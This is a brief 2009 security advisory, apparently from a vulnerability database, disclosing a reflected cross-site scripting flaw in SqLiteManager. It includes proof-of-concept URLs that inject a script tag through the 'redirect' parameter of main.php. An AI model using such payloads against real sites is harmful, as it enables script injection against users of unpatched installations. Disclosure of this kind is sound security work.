Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22288
HistoryAug 10, 2009 - 12:00 a.m.

XSS in SqLiteManager

2009-08-1000:00:00
vulners.com
15

###########################################

SqLiteManager ( All Version ) Cross Site Scripting

Found by : Hadi Kiamarsi

Contact : [email protected]

Download :

http://downloads.sourceforge.net/project/sqlitemanager/sqlitemanager/1.2.0/SQLiteManager-1.2.0.zip?use_mirror=heanet

###########################################

PoC :

http://[www.example.com]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

http://[www.example.com]/[PATH]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/main.php?redirect=&lt;script&gt;alert&#40;&#39;Hadi Kiamarsi')</script>